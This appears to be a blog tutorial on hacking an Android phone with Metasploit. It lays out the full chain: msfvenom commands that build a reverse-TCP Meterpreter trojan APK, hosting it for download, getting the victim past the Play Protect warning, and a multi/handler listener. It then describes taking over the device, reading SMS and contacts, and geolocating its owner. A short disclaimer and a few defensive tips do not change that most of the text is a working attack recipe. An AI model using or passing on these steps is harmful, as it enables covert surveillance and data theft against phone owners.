How Can You Hack Into An Android Device 📱 In 2022?

raghavmri

Raghav Mrituanjaya

Posted on May 10, 2022

How Can You Hack Into An Android Device 📱 In 2022?

We will be seeing how can you hack onto your phone in 2022 using the Metasploit Framework. This attack will be done using a Trojan created using Metasploit

Disclaimer:- This post is only meant to illustrate these attacks and is purely for educational purposes only

What is Metasploit 🤔 ?

Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that can help a cyber security analyst of an organization to find some bugs in their system and recommend some potential ways to solve them. It usually comes pre-installed in Kali Linux. It contains over 590 sets of modules that are essentially useful. Some of the Important ones are mentioned below

  • Command shell enables users to run collection scripts or run arbitrary commands against the host.
  • Meterpreter (the Metasploit Interpreter) enables users to control the screen of a device using VNC and to browse, upload and download files.
  • Dynamic payloads enable users to evade anti-virus defense by generating unique payloads.
  • Static payloads enable static IP address/port forwarding for communication between the host and the client system

Installing Metasploit

  • You can run the following commands to install Metasploit onto your Linux server
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
Enter fullscreen mode Exit fullscreen mode
  • Metasploit is also available for other OS. You can learn about it by clicking on this here
  • If you are looking for a cloud server to test out Metasploit then, do consider Vultr

Playing with Metasploit 😉

  • For figuring out the public IP of our instance(VM in Cloud) We run wget -qO - ipinfo.io which would fetch you similar output to this 👇
{
  "ip": "11.22.33.444",
  "hostname": "8.9.8.1.bc.googleusercontent.com",
  "city": "Singapore",
  "region": "Singapore",
  "country": "SG",
  "loc": "1.2897,103.8501",
  "org": "AS396982 Google LLC",
  "postal": "018989",
  "timezone": "Asia/Singapore",
  "readme": "https://ipinfo.io/missingauth"
}
Enter fullscreen mode Exit fullscreen mode
  • The IP field in the JSON should be the public IP of your instance
  • If you're running on your local network then you have to figure out the internal IP of your instance by running ifconfig

figuring-out-internal-ip

  • Before we further process we have to create a Trojan which we can easily create by running the command mentioned below
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk
Enter fullscreen mode Exit fullscreen mode
  • -p argument indicates the payload that we are going to use. In this case, it will be android/meterpreter/reverse_tcp
  • LHOST will be the host to which you would like to receive the data from the victim. You should change this value to either the public or internal IP of your instance
  • LPORT will be the port to which you want to receive the data from the victim. You could either change this value or use the default which is 4444
  • R> will save the created payload in the specified directory with the specified extension

msfvenom output
msfvenom output

  • Now go to the directory where the payload has been generated, In my case, it will be cd /var/www/html & run python -m SimpleHTTPServer 1234 to spin up a temporary server on port 1234
  • Now you can easily download the APK file onto your phone just by visiting http://private_or_public_ip:1234/filename.apk
  • Once you download the APK and file and try to install the application you might get a similar window popping up where you have to choose the Install anyway option

Blocked By Play Protect

  • Now head over to the instance's terminal and open Metasploit by running msfconsole & run the following commands
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
Enter fullscreen mode Exit fullscreen mode
  • Please change the value of LHOST & LPORT to the one you configured earlier.

Metasploit options

  • Now open the application that you have installed. Ideally, the name should be Main Activity
  • After you open the app, head over to the terminal, and now a new session must be opened wherein you can take the full control of the device

metasploit core commands
Core Commands

  • It also includes some functions that we can use to interact with the Filesystem of the device

File System Commands

  • You may also find some functions to get/send SMS or even get all the contacts

android_commands

  • To find the list of all the possible commands just run ? or help
  • Let's see how we can locate the current position of the user but just running one command that is geolocate

geolocate

Tips to stay away from a Trojan Attack âš”

  • You should not download APKs from untrusted sources
  • In this post, I've just shown to create a Trojan APK but real hackers might merge the trojans with legit Apps and ask us to download the APKs. If you would like to know how can we merge Trojan to another APK file do let me know in the comment section below
  • You should examine the code before you install any opensource applications

Thanks for reading till the end. Do let me know if you have any queries in the comment section below 😀

💖 💪 🙅 🚩
raghavmri
Raghav Mrituanjaya

Posted on May 10, 2022

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related